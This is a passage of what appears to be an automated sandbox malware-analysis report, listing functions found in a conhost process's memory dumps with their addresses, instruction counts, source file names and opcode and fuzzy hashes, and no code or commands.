                                                            • Opcode ID: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction ID: a7948eb87be0f0529a7c3fba2485c21e84a37e0bc2bc83d6a211baf54d2857f8
                                                            • Opcode Fuzzy Hash: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction Fuzzy Hash: A8313821A0E6890FE7969B3888751E93FB0EF87310F0945F7D549C70E3D92CA90697A2
                                                            Function 00007FFD348D2E99 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: a39d08684b2cb14e18750592956dc910fbef330e3de415f237d3631438909d37
                                                            • Instruction ID: e259c51a475d9347715553e063ece3612859e0be77119767b07b7890002dac3d
                                                            • Opcode Fuzzy Hash: a39d08684b2cb14e18750592956dc910fbef330e3de415f237d3631438909d37
                                                            • Instruction Fuzzy Hash: DFF0656150E7C44FD716973848694557FA0EF6721174A52EEC046CF1A7EA1DCC85C711
                                                            Function 00007FFD348D1BB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: e2713da73351a736908ee7d02c33d8928c20dd8027455ec5eafd06969740177e
                                                            • Instruction ID: 8a1433d5f0533c36ea8f1adeca120b0081a674ba5ae5132ce5d4c6d7bbc4b052
                                                            • Opcode Fuzzy Hash: e2713da73351a736908ee7d02c33d8928c20dd8027455ec5eafd06969740177e
                                                            • Instruction Fuzzy Hash: C5E0923064F3C08FCB06EA3484A89547FA0EE6720174A52EEC486CF1A3DA2DC88AC701
                                                            Function 00007FFD348D8169 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 1cd2b15bd9cb6d79975f0bec3b6ffa68956861c3c940415b547a8b587f651a7f
                                                            • Instruction ID: 77bd839df359a662b75f7d3bf71f7860d8486d28babe6d1965c5041436dc9ac9
                                                            • Opcode Fuzzy Hash: 1cd2b15bd9cb6d79975f0bec3b6ffa68956861c3c940415b547a8b587f651a7f
                                                            • Instruction Fuzzy Hash: 0CE01A7154F3C04FCB16AB3488768553FA0EE6B21078B41EEC14ACF1B3E62D8849C711
                                                            Function 00007FFD348C9619 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348c3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 5e51f85ff0d387b4ec77d45699806c37c22464e9266dac9e07d7ddc45da4590c
                                                            • Instruction ID: 3863289434739c7a4ca5fcf1232860b1c845a8c6ef0a832ee2fe3977066e50fd
                                                            • Opcode Fuzzy Hash: 5e51f85ff0d387b4ec77d45699806c37c22464e9266dac9e07d7ddc45da4590c
                                                            • Instruction Fuzzy Hash: A9E01A6154E7C04FCB1AEB74887A8457FA0AE6721078A40EEC14ACF1B3E62DC849C712
                                                            Function 00007FFD348DAD19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 383c225fbd3be67579f1a8e354bf21850fe743b6956195d3f9ad572fb5ac8c6c
                                                            • Instruction ID: 8b311285287da71433212288cf7cd673102ad56066382f6e6f0fdc2c1b2fb5c5
                                                            • Opcode Fuzzy Hash: 383c225fbd3be67579f1a8e354bf21850fe743b6956195d3f9ad572fb5ac8c6c
                                                            • Instruction Fuzzy Hash: 87E01A7194F7D44FCB06EB7488698447FA0EE6B21178B41EEC146CF1B3E62D8849C701
                                                            Function 00007FFD348D1C49 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: a28f3aeead4e25cdc0bbd14db2c927b2818b14a8c51a4d4b1195805721be8802
                                                            • Instruction ID: fdfbd0910cebb5e42ba38f2d06bf7c265dddb8bc8b996cc7b255c5e7697bfe74
                                                            • Opcode Fuzzy Hash: a28f3aeead4e25cdc0bbd14db2c927b2818b14a8c51a4d4b1195805721be8802
                                                            • Instruction Fuzzy Hash: CEE01A7154F7C04FCB4AEB3488698547FB0AE67210B8B41EEC145CF1B3E62E8849C701
                                                            Function 00007FFD348C97C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348c3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: b9c0b8045df9e822ac35a273f15009519ae119eddb090cfae96767b524afaefb
                                                            • Instruction ID: 65eb47ef1913af74af1ded87326ffe867afa01ec732c0f24d504631993310b1b
                                                            • Opcode Fuzzy Hash: b9c0b8045df9e822ac35a273f15009519ae119eddb090cfae96767b524afaefb
                                                            • Instruction Fuzzy Hash: 68E0E56154E7C04FCB06EB7488698447FA0AE6721078A40EEC146CB1A3E62D8849C701
                                                            Function 00007FFD348C9801 Relevance: .2, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348c3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 623acd945789a0b901b55929d777d8df6b88f57c4bea64e880565d11e1e431c5
                                                            • Instruction ID: dbd6e4b88af17704ecc72b01b43c4598c621d667195a58a930ec95ef90bf3f43
                                                            • Opcode Fuzzy Hash: 623acd945789a0b901b55929d777d8df6b88f57c4bea64e880565d11e1e431c5
                                                            • Instruction Fuzzy Hash: 8281B431B1890A4FEB94EB68C4A46A9B7E1FF59310F5041BAD10DD7296DF38BC52CB80
                                                            Function 00007FFD348A08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d64b1e9a99e60c8908b0c2c1ca2299a29026dcd75b5203505d92048b5d945aad
                                                            • Instruction ID: be6ba7a5d9426cbd362245376a9d2199f4f675b733cb438d49443af74de588d6
                                                            • Opcode Fuzzy Hash: d64b1e9a99e60c8908b0c2c1ca2299a29026dcd75b5203505d92048b5d945aad
                                                            • Instruction Fuzzy Hash: 9541F222B0C6650BE754BBFCA0F92FAB795DF86325F0804BBD24DC7193DD68A8418284
                                                            Function 00007FFD348DAEB4 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 090b401128ba8d2bf89f427d90073ad3d2367c82447a59bc6b2b17e949508e2a
                                                            • Instruction ID: a49b6020cab9802b1819bc79da990f488edd7971b33e9af02879197dbdfa6664
                                                            • Opcode Fuzzy Hash: 090b401128ba8d2bf89f427d90073ad3d2367c82447a59bc6b2b17e949508e2a
                                                            • Instruction Fuzzy Hash: 2B41B662B1A94A4FEB98EB5C94F56F873D2EB9A310F1406B6D50DD3282DD2CAC419740
                                                            Function 00007FFD348A090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84a4ede1672c35442d3275c7f4ea8ac1a0ae78dc6716ebd7eb7c636a6b266ced
                                                            • Instruction ID: 273f06fd278f4d0033bcf77a8b104b5320758c441920e7fcf6a1e75a4bba3096
                                                            • Opcode Fuzzy Hash: 84a4ede1672c35442d3275c7f4ea8ac1a0ae78dc6716ebd7eb7c636a6b266ced
                                                            • Instruction Fuzzy Hash: 0641E322B0C6651FE764B7FC60BA6F9B795DF86321F08447AD14DC7193DD68B8418284
                                                            Function 00007FFD348A0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: b95c0fddba714cae56ebba2eec607c2e8af1ad826bfc272167ce991942ba75b3
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 26210A3170DC184FE7A8EB0CE889DB973D1EF9A32170105BAE58EC7125E951EC8287C1
                                                            Function 00007FFD348A4525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction ID: c72533d5cb17247a87bb1c533d6d5b87f0d4f81b654bc3262004b07077e8c00b
                                                            • Opcode Fuzzy Hash: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction Fuzzy Hash: C3312020F0A91A4FEFD4EB2484A57B862D2FF5B700F5400B5D60ED7292DEACAC40A711
                                                            Function 00007FFD348A116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f2f0b92db2518c1b48ff77366acc73f2d26e6425d2d76d5ec2a585349a0a267
                                                            • Instruction ID: cb6410e8093e593c3c7c78a4f00330763bf83353ae09e048f0972b9413378a4e
                                                            • Opcode Fuzzy Hash: 6f2f0b92db2518c1b48ff77366acc73f2d26e6425d2d76d5ec2a585349a0a267
                                                            • Instruction Fuzzy Hash: BC31B431A0D64A8FDB85EB68C8A5AF977F0FF5A300F0545BAC009D7293DE79A841CB50
                                                            Function 00007FFD348A0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3871dbb7b19d7be7da400875beb962a53041d26216cbf38f3f2c503ef2238502
                                                            • Instruction ID: c23005a755ebf1b0670ed7a6ca1a52fa3bf6b1e2db0b0699cfd65e0acfc57304
                                                            • Opcode Fuzzy Hash: 3871dbb7b19d7be7da400875beb962a53041d26216cbf38f3f2c503ef2238502
                                                            • Instruction Fuzzy Hash: 1B21FC21B199590FE7D8E76C54E96B9B6C6DB9A311F1000BDE60DC33D2DD68AC414251
                                                            Function 00007FFD348A0C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction ID: fdab3cff6af208bbab6acc08e01a21042412c9e62ed33bb1b25778f1a9e79b67
                                                            • Opcode Fuzzy Hash: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction Fuzzy Hash: 75212936F0E6599FE712ABB898A10EC7B60EF43321F0441B3D248CB083E97C65469791
                                                            Function 00007FFD348DC0B1 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce73290fcf8ca2d652c4a4cd191fa3368224d49c3f0918891fd525af61528998
                                                            • Instruction ID: fe48fa3b33e22a50218875c0e7f352a777f44233c37384ad97f087fb915abc8b
                                                            • Opcode Fuzzy Hash: ce73290fcf8ca2d652c4a4cd191fa3368224d49c3f0918891fd525af61528998
                                                            • Instruction Fuzzy Hash: 96115B22E0F6894FDB25A76548AA5E97FA0FF57320F4802BBE50CC7093D92D68458382
                                                            Function 00007FFD348D2339 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 622493f193ffc506db488ce16a35e2b3bf3d4f3d3bb334e40dd0fa2787581b8a
                                                            • Instruction ID: a60c336ae910542ff58e00b53d058198fd9341f7b6f5a22f76594453f9ba823c
                                                            • Opcode Fuzzy Hash: 622493f193ffc506db488ce16a35e2b3bf3d4f3d3bb334e40dd0fa2787581b8a
                                                            • Instruction Fuzzy Hash: 6F11C332F0A9168FE768E758C4B16B87391FB56310F4443B9D50DD72C2CE2C78429781
                                                            Function 00007FFD348A56F0 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a320f71f2e6bddb20caa7155ea907a025f60cfed7dbc83c9e52c7727febb3ad
                                                            • Instruction ID: e38bb9652fee93470f539add9f313d6c9adbf2ba95304eb6ceaf972a7b00e1f7
                                                            • Opcode Fuzzy Hash: 3a320f71f2e6bddb20caa7155ea907a025f60cfed7dbc83c9e52c7727febb3ad
                                                            • Instruction Fuzzy Hash: B3116031A09A09CFDB94DB04C494BADB7F2EB59310F15016AC10EE7290CB79A8C1DB04
                                                            Function 00007FFD348A0C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction ID: d7e20ef46caded103447866c82c7d0a7a415cef8aa2d7700b4657cfbc0ef01d9
                                                            • Opcode Fuzzy Hash: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction Fuzzy Hash: F0110231F0E6899FE742DFA888A11EC7BB0EF43310F0440B2C244DB182E97C660A97A0
                                                            Function 00007FFD348A0C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction ID: 3c6f25c25252c45da23a75aba0579235deb93d5d0d959b0794446366e4bf13fb
                                                            • Opcode Fuzzy Hash: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction Fuzzy Hash: 59110431F0E6899FE742DF6888A01DD7BB0EF43310F0440B6C144DB182D97C660A9790
                                                            Function 00007FFD348DDA02 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28a518a0f2857b96f691dd5c316cac09c5b967f5a6fc8b05e0f279230cf81759
                                                            • Instruction ID: c5269184beacb4e284afbb6f7d7f576847b5a3e9b09197af91e588749da0a296
                                                            • Opcode Fuzzy Hash: 28a518a0f2857b96f691dd5c316cac09c5b967f5a6fc8b05e0f279230cf81759
                                                            • Instruction Fuzzy Hash: BF018872F0A5198AEB58C71498A43FD77E2EFD7308F18C135D10DDA185CE3E69829740
                                                            Function 00007FFD348A0C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction ID: 3d479ace959c3510bd325deb31f905d4d0e3b3a52c4ddb87f263459dc55489e5
                                                            • Opcode Fuzzy Hash: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction Fuzzy Hash: 08018F34E0E3899FEB52DFA888A01AD7FB0EF13310F1441F6D144DB182EA7C6A459791
                                                            Function 00007FFD348B4AB0 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcd89a8f8768fe654cdb917249cd89db6916c6b1746d51ce88bbf4bfac958eac
                                                            • Instruction ID: 5e17336931aa322577ed38d81786eb2075760f6ae13e6c75b0c605cb28765cd4
                                                            • Opcode Fuzzy Hash: bcd89a8f8768fe654cdb917249cd89db6916c6b1746d51ce88bbf4bfac958eac
                                                            • Instruction Fuzzy Hash: 12F0BE30F0CA1B4FF655AB0C98E16B93290EF46B10F4086B0D61ED31D6EEBCE80162D8
                                                            Function 00007FFD348A4635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: 35ae8fa9d6c8ca725658f27ceb8a00f2924cf5f348593faf5c6130b85e78c64a
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 1AF0EC30A1A61E8EFF95EF40C8E47F87361FB96701F5401B5C60AD72A1DFAC69809A50
                                                            Function 00007FFD348B42D9 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78327ffbad5f0adc210d2e9afcec380eff64a01f2c236a9fb3cad756337d9f49
                                                            • Instruction ID: 2600a6d060502caf0f0c7a415ba5443c579fe206c9ccd6ba4c2d05cdfb70eb7a
                                                            • Opcode Fuzzy Hash: 78327ffbad5f0adc210d2e9afcec380eff64a01f2c236a9fb3cad756337d9f49
                                                            • Instruction Fuzzy Hash: 76F03C71E0850A8FF724EB84C8A5ABE77B1EF55710F10063AC529D7299CEBC654597C0
                                                            Function 00007FFD348DAC89 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 698a0d64a404d475358452e4164a353129a079838839701b8150873d536ecf3c
                                                            • Instruction ID: cd1319ce680a254d83218c3a19457cc3c631bbce22b53fa1d4fe2c5fbd3ae0e5
                                                            • Opcode Fuzzy Hash: 698a0d64a404d475358452e4164a353129a079838839701b8150873d536ecf3c
                                                            • Instruction Fuzzy Hash: FAF0E5217497C40FC719963944A90617FF1CB5B10234902EFC496C76A3DD58EC868341
                                                            Function 00007FFD348CCB99 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348c3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 110a6bd162a9b23d82c6fe87f04ff1148e051c326aa1b2e9c273ec8e5de1ee4a
                                                            • Instruction ID: e9ba053ee64d10ac7e9d4955239efbef1eeba77394ca752d6f735fce1581891b
                                                            • Opcode Fuzzy Hash: 110a6bd162a9b23d82c6fe87f04ff1148e051c326aa1b2e9c273ec8e5de1ee4a
                                                            • Instruction Fuzzy Hash: B3F0306551E7C41FD3129B388D664547FF0EA1721534B45EBC0CACB4B3D50D8846C312
                                                            Function 00007FFD348A45BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 2c116b0a786b3751e807e9b052c8c1b01c4b9cef602d57735dfd3764030640b0
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: E6F05E30B0A60A4EFFD4EB00C8E46F82391FF57700F100175CA4ED72A2DEAC69409650
                                                            Function 00007FFD348DA819 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 066191c021978f263cbe45088a5921b500866e70261b14c9d7fadbe8ec2229d0
                                                            • Instruction ID: 4f595390450856d3c7b4ef51f028a1aa64559b83aaaa6c68112d154367a99eb2
                                                            • Opcode Fuzzy Hash: 066191c021978f263cbe45088a5921b500866e70261b14c9d7fadbe8ec2229d0
                                                            • Instruction Fuzzy Hash: 92E0927064E3C04FCB0AAB3484A88547F70EE6720134A46EEC446CF1A7DA2DC886C711
                                                            Function 00007FFD348DA789 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
